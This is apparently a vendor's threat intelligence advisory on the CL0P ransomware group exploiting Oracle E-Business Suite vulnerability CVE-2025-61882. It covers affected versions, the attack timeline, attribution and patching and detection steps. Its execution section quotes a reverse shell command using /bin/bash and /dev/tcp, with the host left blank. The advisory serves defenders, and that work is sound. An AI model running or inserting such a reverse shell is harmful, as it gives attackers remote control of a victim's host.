CL0P Leverages Oracle EBS Zero-Day in A Global Extortion Campaign

In October 2025, cybersecurity researchers and vendors including Cybereason, Halcyon, and Oracle confirmed active exploitation of a critical remote code execution (RCE) vulnerability, in Oracle E-Business Suite (EBS) by the CL0P ransomware group.
This zero-day campaign represents a sophisticated data-theft and extortion operation, targeting on-premise, customer-managed Oracle EBS deployments worldwide.

Severity: Critical

Vulnerability Exploited

• CVE ID: CVE-2025-61882
• CVSS Score: 9.8
• Affected Versions: Oracle EBS 12.2.3 – 12.2.14
• Description: The vulnerability permits unauthenticated remote attackers to execute arbitrary commands on affected systems over HTTP, enabling full compromise of Oracle EBS instances.

Threat Details

• Threat Actor: The campaign is attributed with high confidence to the CL0P ransomware operation (FIN11 / TA505), a financially motivated group known for exploiting widely used enterprise platforms to maximize victim reach.
• Timeline: Between late July and early October 2025, CL0P conducted coordinated attacks targeting Oracle EBS environments.
• Initial intrusions leveraged the newly discovered CVE-2025-61882 vulnerability and, in some instances, chained previously unpatched CVEs from Oracle’s July 2025 Critical Patch Update (CPU) cycle.
• Execution: Exploitation led to execution of reverse shell commands, such as sh -c /bin/bash -i >& /dev/tcp//0>&1, enabling direct command execution on the compromised host.
• Persistence and Reconnaissance: Attackers deployed lightweight webshells and credential-harvesting scripts to map EBS data structures.
• Exfiltration: High-value ERP datasets (financial, HR, customer information) were exfiltrated to attacker-controlled infrastructure.
• Extortion Phase: Victims received ransom demands via spoofed or compromised email accounts referencing stolen Oracle EBS data.

Recommendations

1. Implement Oracle July 2025 CPU for Oracle EBS, Database, and Fusion Middleware.
2. Apply October 5, 2025 patch for Oracle EBS addressing CVE 2025-61882.
3. Enforce SSO and MFA for all Oracle EBS and related accounts.
4. Oracle EBS users should engage DFIR if July 2025 patching was incomplete before July 31, 2025. Look for unauthorized password resets, role escalations, or service account modifications. Search for unauthorized scheduled jobs, cron tasks, or database triggers created outside maintenance windows. Review web access and database query logs for large, atypical data exports or downloads from ERP modules.
5. Restrict external access to Oracle EBS URLs such as:
   • https[:]///OA_HTML/AppsLocalLogin.jsp
   • BI Publisher endpoints
6. Block the IOCs at their respective controls
   https://www.virustotal.com/gui/collection/f485056b431b67fecee768dc4cc71a05f86b3c244df4b6a5e950b3a363a14cea/iocs.

Source:

• https://www.cybereason.com/blog/oracle-ebs-extortion-cl0p
• https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
• https://blogs.oracle.com/security/post/apply-july-2025-cpu
• https://www.halcyon.ai/ransomware-research-reports/security-alert-cl0p-abuses-oracle-e-business-suite-for-account-takeover

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.